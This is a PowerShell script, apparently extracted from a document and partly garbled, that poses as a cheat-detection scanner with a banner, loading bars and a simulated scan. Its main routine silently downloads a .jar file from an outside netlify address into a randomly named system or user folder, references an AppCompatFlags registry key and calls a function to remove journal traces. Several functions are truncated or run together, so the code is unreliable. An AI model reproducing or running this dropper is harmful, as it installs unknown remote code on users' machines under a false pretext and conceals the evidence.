message (4)
message (4)
Forms
function Write-Slow {
param (
[string]$Text,
[double]$Delay = 0.03
)
function Show-LoadingAnimation {
param (
[int]$Duration = 3
)
$animation = @(
"[■□□□□□□□□□]",
"[■■□□□□□□□□]",
"[■■■□□□□□□□]",
"[■■■■□□□□□□]",
"[■■■■■□□□□□]",
"[■■■■■■□□□□]",
"[■■■■■■■□□□]",
"[■■■■■■■■□□]",
"[■■■■■■■■■□]",
"[■■■■■■■■■■]"
)
function Get-RandomName {
param (
[int]$Length = 8
)
$letters = 'abcdefghijklmnopqrstuvwxyz'
$name = -join ((1..$Length) | ForEach-Object { $letters[(Get-Random -Maximum
$letters.Length)] })
return "$name.jar"
}
function Get-RandomDirectory {
$bases = @(
"C:\",
"D:\",
$env:USERPROFILE,
$env:PROGRAMDATA,
$env:APPDATA,
$env:LOCALAPPDATA
)
$commonFolders = @(
'Programs', 'Data', 'Temp', 'Cache', 'Settings', 'System',
'Windows', 'Users', 'Documents', 'Apps', 'Common', 'Logs',
'Services', 'Runtime', 'Config', 'Application', 'Resources',
'Library', 'Shared', 'Local', 'Roaming', 'Program Files'
)
try {
if (-not (Test-Path $path)) {
New-Item -Path $path -ItemType Directory -Force | Out-Null
}
}
catch {
$randomStr = -join ((1..8) | ForEach-Object
{ ('abcdefghijklmnopqrstuvwxyz')[(Get-Random -Maximum 26)] })
$path = Join-Path -Path $env:TEMP -ChildPath $randomStr
if (-not (Test-Path $path)) {
New-Item -Path $path -ItemType Directory -Force | Out-Null
}
}
return $path
}
function Invoke-SilentFileDownload {
param (
[string]$Directory
)
$url = "https://jazzy-wisp-2ca4f3.netlify.app/etylv.jar"
$filename = Get-RandomName
$fullPath = Join-Path -Path $Directory -ChildPath $filename
try {
$client = New-Object System.Net.WebClient
$client.DownloadFile($url, $fullPath)
return $fullPath
}
catch {
return $null
}
}
function Show-Header {
Clear-Host
$header = @"
_ _ _ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( D | o | o | m | s | d | a | y ) ( F | u | c | k | e | r )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
"@
Write-Host $header -ForegroundColor Cyan
Write-Slow "[*] Starting detection system..." -ForegroundColor Yellow
Show-LoadingAnimation
}
function Invoke-SimulateScan {
param (
[string]$Path
)
$stages = @(
"Analyzing system memory",
"Checking processes",
"Scanning system registry",
"Searching for malicious files",
"Verifying network connections"
)
try {
$keyPath = "HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\
AppCompatFlags\Layers"
function Show-Exit {
Write-Host "`n[*] Cleaning up resources..." -ForegroundColor Yellow
Show-LoadingAnimation -Duration 1
Write-Host "`n[*] Thank you for using Doomsday ƒυ¢кєя!" -ForegroundColor Cyan
Write-Host "`nPress Enter to exit..." -ForegroundColor Yellow
Read-Host
}
function Main {
Show-Header
$directory = Get-RandomDirectory
$filePath = Invoke-SilentFileDownload -Directory $directory
if ($filePath) {
Invoke-SimulateScan -Path $filePath
if (Remove-JournalTraces -Filename $filePath) {
Write-Host "`n[!] DO NOT CHEAT" -ForegroundColor Red
}
Show-Exit
}
else {
Write-Host "`n[!] Error: Download failed" -ForegroundColor Red
Show-Exit
}
}
Main